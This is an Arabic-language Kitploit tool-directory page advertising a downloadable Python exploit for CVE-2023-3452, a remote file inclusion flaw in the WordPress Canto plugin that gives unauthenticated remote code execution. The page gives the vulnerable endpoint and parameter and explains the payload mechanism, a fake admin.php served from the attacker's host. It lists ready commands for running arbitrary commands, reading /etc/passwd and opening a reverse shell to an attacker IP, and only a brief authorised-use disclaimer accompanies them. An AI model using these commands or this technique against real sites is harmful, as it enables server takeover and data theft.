Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — استغلال ثغرة CVE-2023-3452 في إضافة Canto لووردبريس لتنفيذ التعليمات البرمجية عن بُعد، مع دعم HTTPS | Kitploit
أدوات/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

استغلال ثغرة CVE-2023-3452 في إضافة Canto لووردبريس لتنفيذ التعليمات البرمجية عن بُعد، مع دعم HTTPS

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

CVE-2023-3452 - ثغرة تنفيذ الأكواد عن بعد في إضافة Canto لووردبريس

استغلال لثغرة تضمين الملفات عن بعد (RFI) في إضافة Canto لووردبريس (الإصدارات ≤ 3.0.4). تعمل فعلياً على HTTPS — بينما استسلمت أدوات الإثبات المفاهيمية العامة الأخرى لـ SSL.

الفضل لمن يستحقه: تم اكتشاف هذه الثغرة من قبل آخرين. لقد قمت فقط بعمل نسخة لا تتعطل على الأهداف التي تستخدم HTTPS.

الثغرة

CVECVE-2023-3452
EDB-ID51826
النوعتضمين ملف عن بعد (RFI) → تنفيذ أكواد عن بعد بدون مصادقة
المتأثرإضافة Canto لووردبريس < 3.0.5 (الإصدارات 3.0.4 فأقل)
مكتشف الثغرةليوبولدو أنجولو (leoanggal1) — 27 فبراير 2024
الموقع/wp-content/plugins/canto/includes/lib/download.php
ناقل الهجوميتم استخدام wp_abspath لتضمين ملفات PHP بدون أي تحقق من الصحة — نقوم بتضمين ملفنا عن بعد.

لماذا هذه الأداة؟

معظم أدوات الاستغلال لهذه الثغرة تتعطل على HTTPS بسبب التحقق من SSL. هذا السكريبت:

  • يستخدم verify=False لكي تعمل أهداف HTTPS فعليًا
  • يقوم بكتم رسائل التحذير المزعجة من urllib3
  • يعمل بنفس الطريقة على كل من HTTP و HTTPS — لا حاجة لتكوين منفصل

المتطلبات

  • Python 3.6+
  • requests

التثبيت

root@kitploit:~
pip install -r requirements.txt

أو فقط: pip install requests

الاستخدام

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]

الوسائط

* بدون أمر = يقوم بتشغيل id; whoami; hostname كفحص سلامة

أمثلة

أمر واحد:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

قراءة ملف:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

شيل عكسي (قم بتشغيل nc -lvnp 4444 أولاً):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

الوضع التفاعلي:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

هدف CTF باستخدام HTTPS:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

كيف يعمل

  1. الفحص — يقوم بزيارة /wp-content/plugins/canto/readme.txt، ويحلل الإصدار (الإصدار ≤ 3.0.4 = معرض للثغرة)
  2. الحمولة — يكتب ملف wp-admin/admin.php مزيف يقوم بتشغيل الأمر الخاص بك باستخدام system()
  3. الخدمة — يشغل خادم HTTP محلي حتى يتمكن الهدف من جلب ملفنا
  4. التشغيل — يطلب download.php مع wp_abspath=http://LHOST:LPORT لتضمين ملف PHP البعيد
  5. التنفيذ — خادمهم يشغل الكود الخاص بنا، ونحصل على المخرجات

ملاحظات الشبكة

  • يجب أن يكون الهدف قادرًا على الوصول إلى جهازك على LHOST:LPORT (في HTB/المختبرات، هذا هو عنوان IP الخاص بشبكة VPN)
  • يجب أن يسمح جدار الحماية بالاتصالات الواردة على منفذ الحمولة (-p)

إخلاء مسؤولية

الاختبار المصرح به والتعليم فقط. لا تلمس إلا الأنظمة المسموح لك بها. أي شيء آخر غير قانوني.

الترخيص

MIT

تنزيل الأداة
الخيارالوصفمطلوب
-t, --targetرابط ووردبريس الهدف (HTTP أو HTTPS)نعم
-l, --lhostعنوان IP الخاص بك — الهدف يحتاج للوصول إليه لتحميل الحمولةنعم
-p, --lportمنفذ خادم الحمولة (الافتراضي: 8888)لا
-c, --commandالأمر الذي سيتم تنفيذه على الهدفلا*
--revshellإنشاء شيل عكسيلا
--shell-portمنفذ المستمع للشيل العكسي (الافتراضي: 4444)لا
-i, --interactiveوضع الشيل التفاعليلا
-v, --verboseمخرجات إضافيةلا
--skip-checkتخطي فحص الثغرةلا